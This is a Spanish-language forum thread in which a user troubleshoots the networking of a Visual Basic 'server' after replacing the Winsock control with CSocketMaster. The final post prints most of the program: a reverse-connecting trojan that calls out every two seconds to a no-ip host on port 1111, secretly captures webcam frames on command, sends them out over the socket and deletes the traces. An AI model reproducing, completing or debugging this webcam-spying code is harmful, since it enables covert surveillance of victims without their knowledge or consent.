Autor
|
Tema: CSocketMaster (Leído 2,042 veces)
|
ジ
en la cuna !!
|
Buenas estoy con una aplicacion client/server que lleva el control winsock y para quitarle la dependencia estoy husando estos modulos CSocketMaster.cls & modSocketMaster.bas, el control winsock del server quien quiero quitarle la dependencia no tiene index, luego hago esto en el general declaro: Public WithEvents s As CSocketMaster y n el form load: Private Sub Form_Load() Set S = New CSocketMaster.. .... a todos los Close añado: CloseSck todo bien, compilo y listo, pero cuando corro l servidor en una maquina sin Mswinsck.ocx me bota error diciendo que no se ha registrado correctamente o que es file esta perdido o es invalido, y me marca a la dichosa ocx... porque no me anda bien si lo he echo como he leido en foros, google...y nada eso era todo, salu2. '------------------------------MODIFICADO:--------------------------' He probado ha cambiar los modulos por otros...y lo mismo..nada.
|
|
« Última modificación: 20 Agosto 2006, 15:41 pm por Assassin_G.T.S »
|
|
el tiempo pondrá a cada uno en su lugar
|
|
|
Hendrix
|
as kitado el winsock de las dependencias??? ya que es raro que en makinas kon winsock te funcione y en makinas sin winsok no....
Salu2
|
|
|
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
|
|
|
ジ
en la cuna !!
|
si ahora si me corre...se me olvido quitar el winsock.. pero ahora tengo otro problema...no me conecta con otars maquinas...ni ejecutando el server en esa maquina..solo me conecta en la mia
|
|
|
|
|
|
|
whiskises
|
Pues no se que decirte, esta bien cargado el módulo salvo la s minuscula y mayuscula, aunque no he probado si eso le afecta, ..mira el cortafuegos , si le tienes negado permisos ..quizas por eso desde otra maquina no llegan las conexiones. El módulo de CSocketMaster va perfecto y si se conectan desde otras maquinas, No se que mas decirte, suerte. Salu2
|
|
|
|
|
|
|
ジ
en la cuna !!
|
asi tengo el codigo: General: Dim WithEvents sock As CSocketMaster Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Dim eipi As String * 30, p As String * 5, datos As String
'---delcaramos eipi con un maximo d 30 caracteres , p con maximo de 5, delcaramos la api sendmessage para la webcam nos sirve. Form_Load: Private Sub Form_Load() Set sock = New CSocketMaster Timer1.Interval = 2000 eipi = "www.host.no-ip.com" p = 1111 End Sub Form_QueryUnload: Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) On Error Resume Next DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0 End Sub ' enviamos disconect para dejar d enviar datos a la cam
Data_Arrival: Private Sub sock_DataArrival(ByVal bytesTotal As Long) On Error Resume Next sock.GetData datos
If datos = "camon" Then Timer3.Enabled = True End If If datos = "camstop" Then Timer3.Enabled = False DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0 cammuere End If If datos = "cammuere" Then cammuere End If
Error:
End Sub
Timer1: Private Sub Timer1_Timer() ' intervalo = 2000 ( 2 sg ) On Error Resume Next If sock.State <> 7 Then sock.CloseSck sock.Connect eipi, p Timer2.Enabled = True End If End Sub Function camon: Private Function camon() On Error Resume Next ' en caso d errror... Dim lol As Integer ' val Dim frago As Integer ' + val Dim goblin As String Timer3.Enabled = False ' lo desabilitamos al timer lol = FreeFile ' Devuelve el siguiente numero de archivo valido que no esta en uso frago = 8192 ' la val frago tiene un valor de 8kb goblin = "c:\Juazcp.jpg" ' goblin es = a ese paht & archivo SendMessage mCapHwnd, DISCONNECT, 0, 0 ' por si estavamos conectados enviando datos, antes de volver a conectar desconectamos. mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 320, 240, Me.hwnd, 0) SendMessage mCapHwnd, Connect, 0, 0 SendMessage mCapHwnd, GET_FRAME, 0, 0 SendMessage mCapHwnd, COPY, 0, 0 PV.Picture = Clipboard.GetData ' almacenamos lo datos del clipboard en el picture SavePicture PV.Picture, "c:\" & "Juaz.jpg" 'ahora salvamos la imagen del picture en esa ruta PictureView1.OpenPicture ("c:\Juaz.jpg") ' abrimos la imagen con el control pictureview If PictureView1.SaveJPEG("C:\Juazcp.jpg", True, 50) Then Else ' la guardamos con una calidad de "50" para bajarle el peso End If ' fin d la condicion if Kill ("c:\Juaz.jpg") ' eliminamos la primera captura que salvamos. Open goblin For Binary As #lol ' abrimos n modo binario Do While Not EOF(lol) ' analizamos el tamaño del archivo en bytes camun = Input(frago, #lol) ' en camun metemos esos datos sock.SendData camun ' los vamos enviando DoEvents Loop ' vuelta arriba hasta terminar con el tamaño y d haberlo enviado todo Close #lol ' cerramos cammuere ' ejecutamos esta funcion..que lo k hace esta bien claro, solo es irte a la funcion. Timer3.Enabled = True ' lo abilitamos End Function Function cammuere: Private Function cammuere() On Error Resume Next Kill ("c:\Juazcp.jpg") End Function Timer3: Private Sub Timer3_Timer() ' esta desabilitado y de intervalo 1500 On Error Resume Next camon End Sub Pues asi lo tengo con los modulos que ya dije Y SIN..el control winsock..no se lo añadi. Con migo: 127.0.0.1 si conecta, con otras maquinas NO!!...solo conecta con otras maquinas cuando esta la dichosa ocx..en esa maquina..y si por ejemplo intento volverle a añadir el winsock y sacar los modulos estos pues...tampoco conecta..hasta que: hago un projecto nuevo...eso es todo salu2. PD: ojala alguien me pueda ayudar, no se que pueda ser.
|
|
|
|
|
|
|
|
|